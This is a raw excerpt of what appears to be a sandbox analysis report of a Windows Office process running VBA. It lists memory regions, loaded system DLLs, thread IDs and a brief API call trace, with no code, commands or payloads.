region_type = private
name = "private_0x000000000fe90000"
filename = ""
Region:
id = 940
start_va = 0xffa0000
end_va = 0x10099fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ffa0000"
filename = ""
Region:
id = 941
start_va = 0x87f0000
end_va = 0x87f3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000087f0000"
filename = ""
Region:
id = 942
start_va = 0x89b0000
end_va = 0x89b3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089b0000"
filename = ""
Region:
id = 943
start_va = 0x91d0000
end_va = 0x924afff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091d0000"
filename = ""
Region:
id = 944
start_va = 0x9250000
end_va = 0x9278fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009250000"
filename = ""
Region:
id = 945
start_va = 0x89c0000
end_va = 0x89c3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089c0000"
filename = ""
Region:
id = 946
start_va = 0x8f70000
end_va = 0x8f71fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f70000"
filename = ""
Region:
id = 947
start_va = 0x8f80000
end_va = 0x8f85fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f80000"
filename = ""
Region:
id = 948
start_va = 0x9280000
end_va = 0x9285fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009280000"
filename = ""
Region:
id = 949
start_va = 0x9e90000
end_va = 0x9f0bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009e90000"
filename = ""
Region:
id = 950
start_va = 0xa260000
end_va = 0xa2abfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a260000"
filename = ""
Region:
id = 951
start_va = 0xa510000
end_va = 0xa55bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 952
start_va = 0xa580000
end_va = 0xa5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a580000"
filename = ""
Region:
id = 953
start_va = 0xa6a0000
end_va = 0xa6ebfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a6a0000"
filename = ""
Region:
id = 954
start_va = 0xaa00000
end_va = 0xaa7afff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000aa00000"
filename = ""
Region:
id = 955
start_va = 0x18190000
end_va = 0x1829bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018190000"
filename = ""
Region:
id = 956
start_va = 0x184b0000
end_va = 0x185bafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000184b0000"
filename = ""
Region:
id = 957
start_va = 0x185c0000
end_va = 0x1958ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000185c0000"
filename = ""
Region:
id = 958
start_va = 0x8730000
end_va = 0x8732fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008730000"
filename = ""
Region:
id = 959
start_va = 0xfc70000
end_va = 0xfe52fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 960
start_va = 0xfc70000
end_va = 0x10088fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 961
start_va = 0x8730000
end_va = 0x8731fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008730000"
filename = ""
Region:
id = 962
start_va = 0x87f0000
end_va = 0x87f1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000087f0000"
filename = ""
Region:
id = 963
start_va = 0x89b0000
end_va = 0x89b2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089b0000"
filename = ""
Region:
id = 964
start_va = 0x89c0000
end_va = 0x89c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089c0000"
filename = ""
Region:
id = 965
start_va = 0x8e00000
end_va = 0x8e03fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e00000"
filename = ""
Region:
id = 966
start_va = 0x8e10000
end_va = 0x8e11fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e10000"
filename = ""
Region:
id = 967
start_va = 0x8e20000
end_va = 0x8e23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e20000"
filename = ""
Region:
id = 968
start_va = 0x8e40000
end_va = 0x8e43fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e40000"
filename = ""
Region:
id = 969
start_va = 0x8e50000
end_va = 0x8e53fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e50000"
filename = ""
Region:
id = 970
start_va = 0x8f70000
end_va = 0x8f86fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f70000"
filename = ""
Region:
id = 971
start_va = 0x91d0000
end_va = 0x91e6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091d0000"
filename = ""
Region:
id = 972
start_va = 0x8e60000
end_va = 0x8e62fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e60000"
filename = ""
Region:
id = 973
start_va = 0x91f0000
end_va = 0x91f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091f0000"
filename = ""
Region:
id = 974
start_va = 0x9200000
end_va = 0x9201fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009200000"
filename = ""
Region:
id = 975
start_va = 0x9210000
end_va = 0x9213fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009210000"
filename = ""
Region:
id = 976
start_va = 0x9220000
end_va = 0x9223fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009220000"
filename = ""
Region:
id = 977
start_va = 0x9230000
end_va = 0x9232fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009230000"
filename = ""
Region:
id = 978
start_va = 0x9240000
end_va = 0x9240fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009240000"
filename = ""
Region:
id = 979
start_va = 0x9250000
end_va = 0x9252fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009250000"
filename = ""
Region:
id = 980
start_va = 0x9260000
end_va = 0x9260fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009260000"
filename = ""
Region:
id = 981
start_va = 0x9270000
end_va = 0x9272fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009270000"
filename = ""
Region:
id = 982
start_va = 0x9280000
end_va = 0x9280fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009280000"
filename = ""
Region:
id = 983
start_va = 0xfc70000
end_va = 0xfff9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 984
start_va = 0x7fef3f70000
end_va = 0x7fef3fdafff
monitored = 0
entry_point = 0x7fef3f7101c
region_type = mapped_file
name = "photometadatahandler.dll"
filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll")
Region:
id = 985
start_va = 0x7fef2910000
end_va = 0x7fef2a7ffff
monitored = 0
entry_point = 0x7fef2a43158
region_type = mapped_file
name = "msptls.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msptls.dll")
Region:
id = 986
start_va = 0x91d0000
end_va = 0x9217fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091d0000"
filename = ""
Region:
id = 987
start_va = 0xaa00000
end_va = 0xaac6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibri.ttf"
filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf")
Region:
id = 988
start_va = 0x8730000
end_va = 0x873ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008730000"
filename = ""
Region:
id = 989
start_va = 0x87f0000
end_va = 0x87fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000087f0000"
filename = ""
Region:
id = 990
start_va = 0x87f0000
end_va = 0x87fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000087f0000"
filename = ""
Region:
id = 991
start_va = 0x91d0000
end_va = 0x920ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091d0000"
filename = ""
Region:
id = 992
start_va = 0x7fefa290000
end_va = 0x7fefa300fff
monitored = 0
entry_point = 0x7fefa291010
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 993
start_va = 0x7fefa220000
end_va = 0x7fefa283fff
monitored = 0
entry_point = 0x7fefa221254
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 994
start_va = 0x7fefb2c0000
end_va = 0x7fefb2e6fff
monitored = 0
entry_point = 0x7fefb2c98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 995
start_va = 0x7fefb2b0000
end_va = 0x7fefb2bafff
monitored = 0
entry_point = 0x7fefb2b1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 996
start_va = 0x7fefac70000
end_va = 0x7fefac80fff
monitored = 0
entry_point = 0x7fefac716ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 997
start_va = 0x7fefac50000
end_va = 0x7fefac67fff
monitored = 0
entry_point = 0x7fefac51bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 998
start_va = 0x7fefccc0000
end_va = 0x7fefccc9fff
monitored = 0
entry_point = 0x7fefccc3cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 999
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1000
start_va = 0x7fefca60000
end_va = 0x7fefca66fff
monitored = 0
entry_point = 0x7fefca614b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 1001
start_va = 0x7fefd050000
end_va = 0x7fefd056fff
monitored = 0
entry_point = 0x7fefd05142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 1002
start_va = 0x5350000
end_va = 0x5357fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "urlmon.dll.mui"
filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui")
Region:
id = 1003
start_va = 0x5360000
end_va = 0x5361fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005360000"
filename = ""
Region:
id = 1004
start_va = 0x5370000
end_va = 0x537ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 1005
start_va = 0x5380000
end_va = 0x5387fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 1006
start_va = 0x5390000
end_va = 0x539ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 1007
start_va = 0x7fefcee0000
end_va = 0x7fefcf3afff
monitored = 0
entry_point = 0x7fefcee6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1008
start_va = 0x53a0000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000053a0000"
filename = ""
Region:
id = 1009
start_va = 0x7fef6550000
end_va = 0x7fef65b1fff
monitored = 0
entry_point = 0x7fef6551198
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 1010
start_va = 0x7fef6c10000
end_va = 0x7fef6c2bfff
monitored = 0
entry_point = 0x7fef6c111a0
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 1011
start_va = 0x7fefb880000
end_va = 0x7fefb890fff
monitored = 0
entry_point = 0x7fefb8814c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1012
start_va = 0x195a0000
end_va = 0x1969ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000195a0000"
filename = ""
Region:
id = 1013
start_va = 0x7fef6cb0000
end_va = 0x7fef6cb8fff
monitored = 0
entry_point = 0x7fef6cb14b4
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll")
Region:
id = 1014
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 1015
start_va = 0x91d0000
end_va = 0x927ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091d0000"
filename = ""
Region:
id = 1016
start_va = 0x18190000
end_va = 0x1830ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018190000"
filename = ""
Region:
id = 1017
start_va = 0x7fefa770000
end_va = 0x7fefa777fff
monitored = 0
entry_point = 0x7fefa771414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1018
start_va = 0x7fefaca0000
end_va = 0x7fefacf2fff
monitored = 0
entry_point = 0x7fefaca2b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1019
start_va = 0x18190000
end_va = 0x1828ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018190000"
filename = ""
Region:
id = 1020
start_va = 0x7fefce50000
end_va = 0x7fefcea6fff
monitored = 0
entry_point = 0x7fefce55e38
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 1021
start_va = 0x7fef2f50000
end_va = 0x7fef306efff
monitored = 0
entry_point = 0x7fef2f51048
region_type = mapped_file
name = "webservices.dll"
filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll")
Region:
id = 1022
start_va = 0x184b0000
end_va = 0x185affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000184b0000"
filename = ""
Region:
id = 1023
start_va = 0xa2f0000
end_va = 0xa3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a2f0000"
filename = ""
Region:
id = 1024
start_va = 0x21f0000
end_va = 0x21f2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 1025
start_va = 0x2200000
end_va = 0x2200fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 1026
start_va = 0xa6c0000
end_va = 0xa7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a6c0000"
filename = ""
Region:
id = 1027
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 1028
start_va = 0x21f0000
end_va = 0x21f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021f0000"
filename = ""
Region:
id = 1029
start_va = 0x7fefd260000
end_va = 0x7fefd2affff
monitored = 0
entry_point = 0x7fefd2611e0
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 1030
start_va = 0x2200000
end_va = 0x2209fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "crypt32.dll.mui"
filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui")
Region:
id = 1031
start_va = 0x4cd0000
end_va = 0x4dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cd0000"
filename = ""
Region:
id = 1032
start_va = 0x7fefcb70000
end_va = 0x7fefcb8dfff
monitored = 0
entry_point = 0x7fefcb713b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1033
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 1034
start_va = 0x7fefcb50000
end_va = 0x7fefcb6afff
monitored = 0
entry_point = 0x7fefcb52068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1035
start_va = 0xab30000
end_va = 0xac2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ab30000"
filename = ""
Region:
id = 1036
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 1037
start_va = 0x7fefa5a0000
end_va = 0x7fefa5c6fff
monitored = 0
entry_point = 0x7fefa5a1098
region_type = mapped_file
name = "cryptnet.dll"
filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll")
Region:
id = 1038
start_va = 0xb060000
end_va = 0xb15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b060000"
filename = ""
Region:
id = 1039
start_va = 0x7fef3b60000
end_va = 0x7fef3b7afff
monitored = 0
entry_point = 0x7fef3b61198
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 1040
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 1041
start_va = 0x7fefcb90000
end_va = 0x7fefcba1fff
monitored = 0
entry_point = 0x7fefcb91060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 1086
start_va = 0x2210000
end_va = 0x2229fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002210000"
filename = ""
Region:
id = 1104
start_va = 0x21f0000
end_va = 0x21f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021f0000"
filename = ""
Region:
id = 1105
start_va = 0x2230000
end_va = 0x2254fff
monitored = 0
entry_point = 0x22ff400
region_type = mapped_file
name = "fm20.dll"
filename = "\\Windows\\System32\\FM20.DLL" (normalized: "c:\\windows\\system32\\fm20.dll")
Region:
id = 1106
start_va = 0x7fee6450000
end_va = 0x7fee697afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "vbeuires.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUIRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeuires.dll")
Region:
id = 1107
start_va = 0x7fef78a0000
end_va = 0x7fef7aa8fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "vbeuiintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBEUIINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbeuiintl.dll")
Region:
id = 1108
start_va = 0x2260000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002260000"
filename = ""
Region:
id = 1109
start_va = 0x2270000
end_va = 0x2270fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002270000"
filename = ""
Region:
id = 1110
start_va = 0x2280000
end_va = 0x2289fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vbe6ext.olb"
filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb")
Region:
id = 1111
start_va = 0x7fef49e0000
end_va = 0x7fef4b77fff
monitored = 0
entry_point = 0x7fef4aaf400
region_type = mapped_file
name = "fm20.dll"
filename = "\\Windows\\System32\\FM20.DLL" (normalized: "c:\\windows\\system32\\fm20.dll")
Region:
id = 1112
start_va = 0x8f70000
end_va = 0x8feffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f70000"
filename = ""
Region:
id = 1113
start_va = 0x196a0000
end_va = 0x1989ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000196a0000"
filename = ""
Region:
id = 1114
start_va = 0x7fefb280000
end_va = 0x7fefb287fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fm20enu.dll"
filename = "\\Windows\\System32\\FM20ENU.DLL" (normalized: "c:\\windows\\system32\\fm20enu.dll")
Region:
id = 1115
start_va = 0x8ff0000
end_va = 0x906ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "~df0380f25336733cd6.tmp"
filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~DF0380F25336733CD6.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~df0380f25336733cd6.tmp")
Region:
id = 1116
start_va = 0x7fef7880000
end_va = 0x7fef7898fff
monitored = 0
entry_point = 0x7fef7892830
region_type = mapped_file
name = "asycfilt.dll"
filename = "\\Windows\\System32\\asycfilt.dll" (normalized: "c:\\windows\\system32\\asycfilt.dll")
Region:
id = 1117
start_va = 0x198a0000
end_va = 0x19d8cfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000198a0000"
filename = ""
Region:
id = 1118
start_va = 0x2290000
end_va = 0x2292fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002290000"
filename = ""
Region:
id = 1119
start_va = 0x22a0000
end_va = 0x22aafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022a0000"
filename = ""
Region:
id = 1120
start_va = 0x22b0000
end_va = 0x22d8fff
monitored = 0
entry_point = 0x237f400
region_type = mapped_file
name = "fm20.dll"
filename = "\\Windows\\System32\\FM20.DLL" (normalized: "c:\\windows\\system32\\fm20.dll")
Region:
id = 1121
start_va = 0x22e0000
end_va = 0x22e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 1122
start_va = 0x53a0000
end_va = 0x53a7fff
monitored = 1
entry_point = 0x55033cc
region_type = mapped_file
name = "vbe7.dll"
filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll")
Region:
id = 1123
start_va = 0x53d0000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000053d0000"
filename = ""
Region:
id = 1124
start_va = 0x8e00000
end_va = 0x8e25fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "msforms.exd"
filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\VBE\\MSForms.exd" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\vbe\\msforms.exd")
Region:
id = 1125
start_va = 0x2230000
end_va = 0x2246fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 1126
start_va = 0x2250000
end_va = 0x2252fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002250000"
filename = ""
Region:
id = 1127
start_va = 0x2290000
end_va = 0x2290fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002290000"
filename = ""
Region:
id = 1128
start_va = 0x2230000
end_va = 0x2231fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 1129
start_va = 0x2240000
end_va = 0x2241fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002240000"
filename = ""
Region:
id = 1130
start_va = 0x2250000
end_va = 0x2251fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002250000"
filename = ""
Thread:
id = 1
os_tid = 0xec4
Thread:
id = 2
os_tid = 0xec0
Thread:
id = 3
os_tid = 0xebc
Thread:
id = 4
os_tid = 0xeb8
Thread:
id = 5
os_tid = 0xeb0
Thread:
id = 6
os_tid = 0xea8
Thread:
id = 7
os_tid = 0xea4
Thread:
id = 8
os_tid = 0xea0
Thread:
id = 9
os_tid = 0xe9c
Thread:
id = 10
os_tid = 0xe98
Thread:
id = 11
os_tid = 0xe74
Thread:
id = 12
os_tid = 0xe70
Thread:
id = 13
os_tid = 0xe6c
Thread:
id = 14
os_tid = 0xe68
Thread:
id = 15
os_tid = 0xe64
Thread:
id = 16
os_tid = 0xe60
Thread:
id = 17
os_tid = 0xe5c
Thread:
id = 18
os_tid = 0xe58
Thread:
id = 19
os_tid = 0xe54
Thread:
id = 20
os_tid = 0xe50
Thread:
id = 21
os_tid = 0xe4c
Thread:
id = 22
os_tid = 0xe48
[0212.635] DispCallFunc (pvInstance=0x0, oVft=0x70d9ebc, cc=0x4, vtReturn=0x0, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x15e1b0) returned 0x0
[0212.655] memcpy (in: _Dst=0x1086f010, _Src=0x3d5698, _Size=0x20 | out: _Dst=0x1086f010) returned 0x1086f010
[0212.655] SafeArrayAllocData (psa=0x1086f010) returned 0x0
[0212.656] memcpy (in: _Dst=0x1086efe8, _Src=0x3d56f8, _Size=0x20 | out: _Dst=0x1086efe8) returned 0x1086efe8
[0212.656] SafeArrayAllocData (psa=0x1086efe8) returned 0x0
[0212.656] memcpy (in: _Dst=0x1086efc0, _Src=0x3d574c, _Size=0x20 | out: _Dst=0x1086efc0) returned 0x1086efc0
[0212.656] SafeArrayAllocData (psa=0x1086efc0) returned 0x0
[0212.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x7fef40f1498, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x15dc90 | out: lpThreadId=0x15dc90*=0xef8) returned 0x860
[0212.668] PeekMessageA (in: lpMsg=0x15dc30, hWnd=0x40418, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x15dc30) returned 0
[0212.668] GetActiveWindow () returned 0x30434
[0212.670] SysStringLen (param_1="msprotB7") returned 0x8
[0212.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0212.670] SysStringLen (param_1="msprotB7") returned 0x8
[0212.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=9, lpMultiByteStr=0x10ad0b88, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msprotB7", lpUsedDefaultChar=0x0) returned 9
[0212.670] SetErrorMode (uMode=0x8001) returned 0x8001
[0212.671] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1
[0212.671] LoadLibraryA (lpLibFileName="user32") returned 0x77780000
[0212.671] DeactivateActCtx (dwFlags=0x0, ulCookie=0x113dc79800000fae) returned 1
